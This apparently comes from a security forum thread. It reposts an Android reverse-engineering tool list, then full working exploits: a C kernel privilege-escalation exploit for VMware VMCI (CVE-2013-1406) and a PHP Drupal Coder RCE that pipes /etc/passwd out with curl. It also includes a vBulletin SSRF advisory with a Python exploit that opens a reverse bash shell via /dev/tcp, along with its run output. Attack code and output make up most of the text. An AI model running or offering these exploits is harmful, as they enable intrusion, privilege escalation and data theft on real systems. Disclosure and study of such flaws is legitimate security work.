FERNFLOWER Fernflower is the first actually working analytical decompiler for Java. 22. REDEXER Redexer is a reengineering tool that manipulates Android app binaries. This tool is able to parse a DEX file into an in-memory data structure; to infer with which parameters the app uses certain permissions (we name this feature RefineDroid); to modify and unparse that data structure to produce an output DEX file (we name these features Dr. Android, which stands for Dalvik Rewriting for Android). 23. SIMPLIFY ANDROID DEOBFUSCATOR Simplify virtually executes an app to understand its behavior and then tries to optimize the code so that it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn’t matter which specific type of obfuscation is used. 24. BYTECODE VIEWER Bytecode Viewer is an Advanced Lightweight Java Bytecode Viewer, GUI Java Decompiler, GUI Bytecode Editor, GUI Smali, GUI Baksmali, GUI APK Editor, GUI Dex Editor, GUI APK Decompiler, GUI DEX Decompiler, GUI Procyon Java Decompiler, GUI Krakatau, GUI CFR Java Decompiler, GUI FernFlower Java Decompiler, GUI DEX2Jar, GUI Jar2DEX, GUI Jar-Jar, Hex Viewer, Code Searcher, Debugger and more. It’s written completely in Java, and it’s open source. It’s currently being maintained and developed by Konloch. There is also a plugin system that will allow you to interact with the loaded classfiles, for example you can write a String deobfuscator, a malicious code searcher, or something else you can think of. You can either use one of the pre-written plugins, or write your own. It supports groovy scripting. Once a plugin is activated, it will execute the plugin with a ClassNode ArrayList of every single class loaded in BCV; this allows the user to handle it completely using ASM. 25. RADARE2 r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files. 
Radare project started as a forensics tool, a scriptable command-line hexadecimal editor able to open disk files, but later added support for reversing apks, analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers, etc… Sursa: https://hackerlists.com/android-reverse-engineering-tools/
  16. Prezentarile de la Defcon 2016. Link: https://media.defcon.org/DEF CON 24/DEF CON 24 presentations/
  17. VMware Virtual Machine Communication Interface (VMCI) vmci.sys - Proof of Concept /* CVE-2013-1406 exploitation PoC by Artem Shishkin, Positive Research, Positive Technologies, 02-2013 */ void __stdcall FireShell(DWORD dwSomeParam) { EscalatePrivileges(hProcessToElevate); // Equate the stack and quit the cycle #ifndef _AMD64_ __asm { pop ebx pop edi push 0xFFFFFFF8 push 0xA010043 } #endif } HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0) { HANDLE hResult = 0; DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return 0; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr)) { hResult = pHandleTable->Handles[i].HandleValue; break; } } return hResult; } PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) { PVOID pResult = 0; DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return 0; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) { pResult = (HANDLE)pHandleTable->Handles[i].Object; break; } } return pResult; } void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) { DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == 
(HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) { pHandleTable->Handles[i].Object = NULL; pHandleTable->Handles[i].HandleValue = NULL; break; } } return; } void PoolSpray() { // Init used native API function lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation"); if (NtQuerySystemInformation == NULL) { printf("Such a fail...\n"); return; } // Determine object size // xp: //const DWORD_PTR dwSemaphoreSize = 0x38; // 7: //const DWORD_PTR dwSemaphoreSize = 0x48; DWORD_PTR dwSemaphoreSize = 0; if (LOBYTE(GetVersion()) == 5) { dwSemaphoreSize = 0x38; } else if (LOBYTE(GetVersion()) == 6) { dwSemaphoreSize = 0x48; } unsigned int cycleCount = 0; while (cycleCount < 50000) { HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL); if (hTemp == NULL) { break; } ++cycleCount; } printf("\t[+] Spawned lots of semaphores\n"); printf("\t[.] Initing pool windows\n"); Sleep(2000); DWORD dwNeeded = 4096; NTSTATUS status = 0xFFFFFFFF; PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE); while (true) { status = NtQuerySystemInformation(SystemExtendedHandleInformation, pBuf, dwNeeded, NULL); if (status != STATUS_SUCCESS) { dwNeeded *= 2; VirtualFree(pBuf, 0, MEM_RELEASE); pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE); } else { break; } }; HANDLE hHandlesToClose[0x30] = {0}; DWORD dwCurPID = GetCurrentProcessId(); PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf; for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++) { if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID) { DWORD_PTR dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object; DWORD_PTR dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue; DWORD_PTR dwWindowAddress = 0; bool bPoolWindowFound = false; UINT iObjectsNeeded = 0; // Needed window size is vmci packet pool chunk size (0x218) divided by // 
Semaphore pool chunk size (dwSemaphoreSize) iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0); if ( // Not on a page boundary ((dwTestObjAddr & 0xFFF) != 0) && // Doesn't cross page boundary (((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000)) ) { // Check previous object for being our semaphore DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize; if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL) { continue; } for (unsigned int j = 1; j < iObjectsNeeded; j++) { DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize); HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr); //printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal); //printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr); //printf("\tLooked up handle = %08X\n", hLookedUp); if (hLookedUp != NULL) { hHandlesToClose[j] = hLookedUp; if (j == iObjectsNeeded - 1) { // Now test the following object dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize); if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL) { hHandlesToClose[0] = (HANDLE)dwTestHandleVal; bPoolWindowFound = true; dwWindowAddress = dwTestObjAddr; // Close handles to create a memory window for (int k = 0; k < iObjectsNeeded; k++) { if (hHandlesToClose[k] != NULL) { CloseHandle(hHandlesToClose[k]); CloseTableHandle(pHandleTable, hHandlesToClose[k]); } } } else { memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); break; } } } else { memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); break; } } if (bPoolWindowFound) { printf("\t[+] Window found at %08X!\n", dwWindowAddress); } } } } VirtualFree(pBuf, 0, MEM_RELEASE); return; } void InitFakeBuf(PVOID pBuf, DWORD dwSize) { if (pBuf != NULL) { RtlFillMemory(pBuf, dwSize, 0x11); } return; } void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep) { /* Previous chunk size will be always 0x43 and the pool index will be 0, so the last bytes will be 
0x0043 So, for every 0xXXXX0043 address we must suffice the following conditions: lea edx, [eax+38h] lock xadd [edx], ecx cmp ecx, 1 Some sort of lock at [addr + 38] must be equal to 1. And call dword ptr [eax+0ACh] The call site is located at [addr + 0xAC] Also fake the object to be dereferenced at [addr + 0x100] */ if (pBuf != NULL) { for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep) { PDWORD pLock = (PDWORD)(iAddr + 0x38); PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC); PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100); *pLock = 1; *pCallMeMayBe = (DWORD_PTR)FireShell; *pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000; } } return; } void PenetrateVMCI() { /* VMware Security Advisory Advisory ID: VMSA-2013-0002 Synopsis: VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability Issue date: 2013-02-07 Updated on: 2013-02-07 (initial advisory) CVE numbers: CVE-2013-1406 */ DWORD dwPidToElevate = 0; HANDLE hSuspThread = NULL; bool bXP = (LOBYTE(GetVersion()) == 5); bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1)); bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2)); if (!InitKernelFuncs()) { printf("[-] Like I don't know where the shellcode functions are\n"); return; } if (bXP) { printf("[?] 
Who do we want to elevate?\n"); scanf_s("%d", &dwPidToElevate); hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate); if (hProcessToElevate == NULL) { printf("[-] This process doesn't want to be elevated\n"); return; } } if (b7 || b8) { // We are unable to change an active process token on-the-fly, // so we create a custom shell suspended (Ionescu hack) STARTUPINFO si = {0}; PROCESS_INFORMATION pi = {0}; si.wShowWindow = TRUE; WCHAR cmdPath[MAX_PATH] = {0}; GetSystemDirectory(cmdPath, MAX_PATH); wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe"); if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi) == TRUE) { hProcessToElevate = pi.hProcess; hSuspThread = pi.hThread; } } HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL); if (hVMCIDevice != INVALID_HANDLE_VALUE) { UCHAR BadBuff[0x624] = {0}; UCHAR retBuf[0x624] = {0}; DWORD dwRet = 0; printf("[+] VMCI service found running\n"); PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff; pVmReq->Header.RequestSize = 0xFFFFFFF0; PVOID pShellSprayBufStd = NULL; PVOID pShellSprayBufQtd = NULL; PVOID pShellSprayBufStd7 = NULL; PVOID pShellSprayBufQtd7 = NULL; PVOID pShellSprayBufChk8 = NULL; if ((b7) || (bXP) || (b8)) { /* Significant bits of a PoolType of a chunk define the following regions: 0x0A000000 - 0x0BFFFFFF - Standard chunk 0x1A000000 - 0x1BFFFFFF - Quoted chunk 0x0 - 0xFFFFFFFF - Free chunk - no idea Addon for Windows 7: Since PoolType flags have changed, and "In use flag" is now 0x2, define an additional region for Win7: 0x04000000 - 0x06000000 - Standard chunk 0x14000000 - 0x16000000 - Quoted chunk */ pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufStd7 = 
VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if ((pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL)) { printf("\t[-] Unable to map the needed memory regions, please try running the app again\n"); CloseHandle(hVMCIDevice); return; } InitFakeBuf(pShellSprayBufStd, 0x2000000); InitFakeBuf(pShellSprayBufQtd, 0x2000000); InitFakeBuf(pShellSprayBufStd7, 0x2000000); InitFakeBuf(pShellSprayBufQtd7, 0x2000000); PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000); if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE) { SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST); } PoolSpray(); if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE) { printf("\t[!] If you don't see any BSOD, you're successful\n"); if (b7 || b8) { ResumeThread(hSuspThread); } } else { printf("[-] Not this time %d\n", GetLastError()); } if (pShellSprayBufStd != NULL) { VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE); } if (pShellSprayBufQtd != NULL) { VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE); } } SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL); CloseHandle(hVMCIDevice); } else { printf("[-] Like I don't see vmware here\n"); } CloseHandle(hProcessToElevate); return; } Sursa: https://www.exploit-db.com/exploits/40164/
  18. Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039) <?php # Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039) # https://www.drupal.org/node/2765575 # by Raz0r (http://raz0r.name) # # E-DB Note: Source ~ https://gist.github.com/Raz0r/7b7501cb53db70e7d60819f8eb9fcef5 $cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd"; $host = "http://localhost:81/drupal-7.12/"; $a = array( "upgrades" => array( "coder_upgrade" => array( "module" => "color", "files" => array("color.module") ) ), "extensions" => array("module"), "items" => array (array("old_dir"=>"test; $cmd;", "new_dir"=>"test")), "paths" => array( "modules_base" => "../../../", "files_base" => "../../../../sites/default/files" ) ); $payload = serialize($a); file_get_contents($host . "/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php?file=data://text/plain;base64," . base64_encode($payload)); ?> Sursa: https://www.exploit-db.com/exploits/40144/
  19. ============================================= - Discovered by: Dawid Golunski - http://legalhackers.com - dawid (at) legalhackers.com - CVE-2016-6483 - Release date: 05.08.2016 - Severity: High ============================================= I. VULNERABILITY ------------------------- vBulletin <= 5.2.2 Preauth Server Side Request Forgery (SSRF) vBulletin <= 4.2.3 vBulletin <= 3.8.9 II. BACKGROUND ------------------------- vBulletin (vB) is a proprietary Internet forum software package developed by vBulletin Solutions, Inc., a division of Internet Brands. https://www.vbulletin.com/ https://en.wikipedia.org/wiki/VBulletin A google search for "Powered by vBulletin" returns over 19 million sites that are hosting a vBulletin forum: https://www.google.co.uk/?gws_rd=ssl#q=%22Powered+by+vBulletin%22 III. INTRODUCTION ------------------------- vBulletin forum software is affected by an SSRF vulnerability that allows unauthenticated remote attackers to access internal services (such as mail servers, memcached, couchDB, zabbix etc.) running on the server hosting vBulletin as well as services on other servers on the local network that are accessible from the target. This advisory provides a PoC exploit that demonstrates how an unauthenticated attacker could perform a port scan of the internal services as well as execute arbitrary system commands on a target vBulletin host with a locally installed Zabbix Agent monitoring service. IV. DESCRIPTION ------------------------- vBulletin allows forum users to share media files by uploading them to the remote server. Some pages allow users to specify a URL to a media file that a user wants to share which will then be retrieved by vBulletin. The user-provided links are validated to make sure that users can only access resources from HTTP/HTTPS protocols and that connections are not allowed to the localhost. 
These restrictions can be found in core/vb/vurl/curl.php source file: /** * Determine if the url is safe to load * * @param $urlinfo -- The parsed url info from vB_String::parseUrl -- scheme, port, host * @return boolean */ private function validateUrl($urlinfo) { // VBV-11823, only allow http/https schemes if (!isset($urlinfo['scheme']) OR !in_array(strtolower($urlinfo['scheme']), array('http', 'https'))) { return false; } // VBV-11823, do not allow localhost and 127.0.0.0/8 range by default if (!isset($urlinfo['host']) OR preg_match('#localhost|127\.(\d)+\.(\d)+\.(\d)+#i', $urlinfo['host'])) { return false; } if (empty($urlinfo['port'])) { if ($urlinfo['scheme'] == 'https') { $urlinfo['port'] = 443; } else { $urlinfo['port'] = 80; } } // VBV-11823, restrict detination ports to 80 and 443 by default // allow the admin to override the allowed ports in config.php (in case they have a proxy server they need to go to). $config = vB::getConfig(); [...] HTTP redirects are also prohibited however there is one place in the vBulletin codebase that accepts redirects from the target server specified in a user-provided link. The code is used to upload media files within a logged-in user's profile and can normally be accessed under a path similar to: http://forum/vBulletin522/member/1-mike/media By specifying a link to a malicious server that returns a 301 HTTP redirect to the URL of http://localhost:3306 for example, an attacker could easily bypass the restrictions presented above and make a connection to mysql/3306 service listening on the localhost. This introduces a Server Side Request Forgery (SSRF) vulnerability. As curl is used to fetch remote resources, in addition to HTTP, attackers could specify a handful of other protocols to interact with local services. For instance, by sending a redirect to gopher://localhost:11211/datahere attackers could send arbitrary traffic to memcached service on 11211 port. 
Additionally, depending on the temporary directory location configured within the forum, attackers could potentially view the service responses as the download function stores responses within temporary files which could be viewed if the temporary directory is exposed on the web server. V. PROOF OF CONCEPT EXPLOIT ------------------------- The exploit code below performs a port scan as well as demonstrates remote command execution via a popular Zabbix Agent monitoring service which might be listening on local port of 10050. The exploit will execute a reverse bash shell on the target if it has the agent installed and permits remote commands. The exploit was verified on the following zabbix agent configuration (/etc/zabbix/zabbix_agentd.conf): Server=127.0.0.1,::1 EnableRemoteCommands=1 ------------[ vBulletin_SSRF_exploit.py ]----------- #!/usr/bin/python intro = """ vBulletin <= 5.2.2 SSRF PoC Exploit (portscan / zabbix agent RCE) This PoC exploits an SSRF vulnerability in vBulletin to scan internal services installed on the web server that is hosting the vBulletin forum. After the scan, the exploit also checks for a Zabbix Agent (10050) port and gives an option to execute a reverse shell (Remote Commands) that will connect back to the attacker's host on port 8080 by default. Coded by: Dawid Golunski http://legalhackers.com """ usage = """ Usage: The exploit requires that you have an external IP and can start a listener on port 80/443 on the attacking machine. ./vBulletin_SSRF_exploit.py our_external_IP vBulletin_base_url [minimum_port] [maximum_port] Example invocation that starts listener on 192.168.1.40 (port 80) and scans local ports 1-85 on the remote vBulletin target host: ./vBulletin_SSRF_exploit.py 192.168.1.40 http://vbulletin-target/forum 1 85 Before exploiting Zabbix Agent, start your netcat listener on 8080 port in a separate shell e.g: nc -vv -l -p 8080 Disclaimer: For testing purposes only. Do no harm. SSL/TLS support needs some tuning. 
For better results, provide HTTP URL to the vBulletin target. """ import web # http://webpy.org/installation import threading import time import urllib import urllib2 import socket import ssl import sys # The listener that will send redirects to the targe class RedirectServer(threading.Thread): def run (self): urls = ('/([0-9a-z_]+)', 'do_local_redir') app = web.application(urls, globals()) #app.run() return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', our_port)) class do_local_redir: def GET(self,whereto): if whereto == "zabbixcmd_redir": # code exec # redirect to gopher://localhost:10050/1system.run[(/bin/bash -c 'nohup bash -i >/dev/tcp/our_ip/shell_port 0<&1 2>&1 &') ; sleep 2s] return web.HTTPError('301', {'Location': 'gopher://localhost:10050/1system.run%5b(%2Fbin%2Fbash%20-c%20%27nohup%20bash%20-i%20%3E%2Fdev%2Ftcp%2F'+our_ext_ip+'%2F'+str(shell_port)+'%200%3C%261%202%3E%261%20%26%27) %20%3B%20sleep%202s%5d' } ) else: # internal port connection return web.HTTPError('301', {'Location': "telnet://localhost:%s/" % whereto} ) def shutdown(code): print "\nJob done. Exiting" if redirector_started == 1: web.httpserver.server.interrupt = KeyboardInterrupt() exit(code) # [ Default settings ] # reverse shell will connect back to port defined below shell_port = 8080 # Our HTTP redirector/server port (must be 80 or 443 for vBulletin to accept it) our_port = 443 # How long to wait (seconds) before considering a port to be opened. 
# Don't set it too high to avoid service timeout and an incorrect close state connect_time = 2 # Default port scan range is limited to 20-90 to speed up things when testing, # feel free to increase maxport to 65535 here or on the command line if you've # got the time ;) minport = 20 maxport = 90 # ignore invalid certs (enable if target forum is HTTPS) #ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) # [ Main Meat ] print intro redirector_started = 0 if len(sys.argv) < 3 : print usage sys.exit(2) # Set our HTTP Listener/Redirector's external IP our_ext_ip = sys.argv[1] try: socket.inet_aton(our_ext_ip) except socket.error: print "Invalid HTTP redirector server IP [%s]!\n" % our_ext_ip exit(2) our_server = "http://%s:%s" % (our_ext_ip, our_port) # Target forum base URL (e.g. http://vulnerable-vbulletin/forum) targetforum = sys.argv[2] # Append vulnerable media upload script path to the base URL targeturl = targetforum.strip('/') + "/link/getlinkdata" # Change port range (if provided) if (len(sys.argv) == 5) : minport = int(sys.argv[3]) # Finish scanning at maxport maxport = int(sys.argv[4]) # Confirm data print "\n* Confirm your settings\n" print "Redirect server to listen on: %s:%s\nTarget vBulletin URL: %s\nScan ports between: %d - %d\n" % (our_ext_ip, our_port, targeturl, minport, maxport) key = raw_input("Are these settings correct? Hit enter to start the port scan... 
") # Connection check print "\n* Testing connection to vulnerable script at [%s]\n" % targeturl req = urllib2.Request(targeturl, data=' ', headers={ 'User-Agent': 'Mozilla/5.0' } ) try: response = urllib2.urlopen(req, timeout=connect_time).read() except urllib2.URLError as e: print "Invalid forum URI / HTTP request failed (reason: %s)\n" % e.reason shutdown(2) # Server should return 'invalid_url' string if not url provided in POST if "invalid_url" not in response: print """Invalid target url (%s) or restricted access.\n \nTest with:\n curl -X POST -v %s\nShutting down\n""" % (targeturl, targeturl) sys.exit(2) else: print "Got the right response from the URL. The target looks vulnerable!\n" # [ Start the listener and perform a port scan ] print "Let's begin!\n" print "* Starting our redirect base server on %s:%s \n" % (our_ext_ip, our_port) RedirectServer().start() redirector_started = 1 print "* Scanning local ports from %d to %d on [%s] target \n" % (minport, maxport, targetforum) start = time.time() opened_ports = [] maxport+=1 for targetport in range(minport, maxport): #print "\n\nScanning port %d\n" % (targetport) fetchurl = '%s/%d' % (our_server, targetport) data = urllib.urlencode({'url' : fetchurl}) req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } ) try: response = urllib2.urlopen(req, timeout=connect_time) except urllib2.URLError, e: print "Oops, url issue? 403 , 404 etc.\n" except socket.timeout, ssl.SSLError: print "Conection opened for %d seconds. Port %d is opened!\n" % (connect_time, targetport) opened_ports.append(targetport) elapsed = (time.time() - start) print "\nScanning done in %d seconds. \n\n* Opened ports on the target [%s]: \n" % (elapsed, targetforum) for listening in opened_ports: print "Port %d : Opened\n" % listening print "\nAnything juicy? 
:)\n" if 10050 in opened_ports: print "* Zabbix Agent was found on port 10050 !\n" # [ Command execution via Zabbix Agent to gain a reverse shell ] key = raw_input("Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] ") if key != 'y' : shutdown(0) print "\n* Executing reverse shell via Zabbix Agent (10050)." fetchurl = '%s/%s' % (our_server, 'zabbixcmd_redir') data = urllib.urlencode({'url' : fetchurl}) req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } ) payload_executed = 0 try: response = urllib2.urlopen(req, timeout=connect_time) except urllib2.URLError, e: print "Oops, url issue? 403 , 404 etc.\n" except socket.timeout, ssl.SSLError: # Agent connection remained opened for 2 seconds after the bash payload was sent, # it looks like the sleep 2s shell command must have got executed sucessfuly payload_executed = 1 if (payload_executed == 1) : print "\nLooks like Zabbix Agent executed our bash payload! Check your netcat listening on port %d for shell! :)\n" % shell_port else: print "\nNo luck. No Zabbix Agent listening on 10050 port or remote commands are disabled :(\n" shutdown(0) ----------------------[ eof ]------------------------ Example run: root@trusty:~/vbexploit# ./vBulletin_SSRF_exploit.py 192.168.57.10 http://192.168.57.10/vBulletin522new/ 20 85 vBulletin <= 5.2.2 SSRF PoC Exploit (Localhost Portscan / Zabbix Agent RCE) This PoC exploits an SSRF vulnerability in vBulletin to scan internal services installed on the web server that is hosting the vBulletin forum. After the scan, the exploit also checks for a Zabbix Agent (10050) port and gives an option to execute a reverse shell (Remote Commands) that will connect back to the attacker's host on port 8080 by default. 
Coded by: Dawid Golunski http://legalhackers.com * Confirm your settings Redirect server to listen on: 192.168.57.10:443 Target vBulletin URL: http://192.168.57.10/vBulletin522new/link/getlinkdata Scan ports between: 20 - 85 Are these settings correct? Hit enter to start the port scan... * Testing connection to vulnerable script at [http://192.168.57.10/vBulletin522new/link/getlinkdata] Got the right response from the URL. The target looks vulnerable! Let's begin! * Starting our redirect base server on 192.168.57.10:443 * Scanning local ports from 20 to 85 on [http://192.168.57.10/vBulletin522new/] target http://0.0.0.0:443/ 192.168.57.10:58675 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /20" - 301 192.168.57.10:58679 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /21" - 301 192.168.57.10:58683 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /22" - 301 Conection opened for 2 seconds. Port 22 is opened! 192.168.57.10:58686 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /23" - 301 192.168.57.10:58690 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /24" - 301 192.168.57.10:58694 - - [30/Jul/2016 03:00:28] "HTTP/1.1 GET /25" - 301 Conection opened for 2 seconds. Port 25 is opened! 192.168.57.10:58697 - - [30/Jul/2016 03:00:30] "HTTP/1.1 GET /26" - 301 [...] 192.168.57.10:58909 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /79" - 301 192.168.57.10:58913 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /80" - 301 Conection opened for 2 seconds. Port 80 is opened! 192.168.57.10:58917 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /81" - 301 192.168.57.10:58921 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /82" - 301 192.168.57.10:58925 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /83" - 301 192.168.57.10:58929 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /84" - 301 192.168.57.10:58933 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /85" - 301 Scanning done in 14 seconds. * Opened ports on the target [http://192.168.57.10/vBulletin522new/]: Port 22 : Opened Port 25 : Opened Port 80 : Opened Anything juicy? 
  :) Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] y * Executing reverse shell via Zabbix Agent (10050). 192.168.57.10:58940 - - [30/Jul/2016 03:00:45] "HTTP/1.1 GET /zabbixcmd_redir" - 301 Looks like Zabbix Agent executed our bash payload! Check your netcat listening on port 8080 for shell! :) Job done. Exiting Here is what the netcat session looks like after a successful exploitation: $ nc -vvv -l -p 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [192.168.57.10] port 8080 [tcp/*] accepted (family 2, sport 54259) zabbix@trusty:/$ id id uid=122(zabbix) gid=129(zabbix) groups=129(zabbix) zabbix@trusty:/$ As we can see, the reverse shell was executed on the target and successfully connected back to the attacker's netcat listener. VI. BUSINESS IMPACT ------------------------- The vulnerability can expose internal services running on the server/within the local network. If not patched, unauthenticated attackers or automated scanners searching for vulnerable servers could send malicious data to internal services. Depending on services in use, the impact could range from sensitive information disclosure, sending spam, DoS/data loss to code execution as demonstrated by the PoC exploit in this advisory. VII. SYSTEMS AFFECTED ------------------------- All vBulletin forums in all branches (5.x, 4.x , 3.x) without the latest patches named in the next section are affected by this vulnerability. VIII. SOLUTION ------------------------- Following this advisory, the vendor has published the following security releases of vBulletin for each of the affected branches: vBulletin 5.2.3 vBulletin 4.2.4 Beta vBulletin 3.8.10 Beta Separate patches have also been released (see references below). IX. 
REFERENCES ------------------------- http://legalhackers.com http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6483 vBulletin patches: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349551-security-patch-vbulletin-5-2-0-5-2-1-5-2-2 http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349549-security-patch-vbulletin-4-2-2-4-2-3-4-2-4-beta http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349548-security-patch-vbulletin-3-8-7-3-8-8-3-8-9-3-8-10-beta X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com http://legalhackers.com XI. REVISION HISTORY ------------------------- 05.08.2016 - final advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. Sursa: http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt
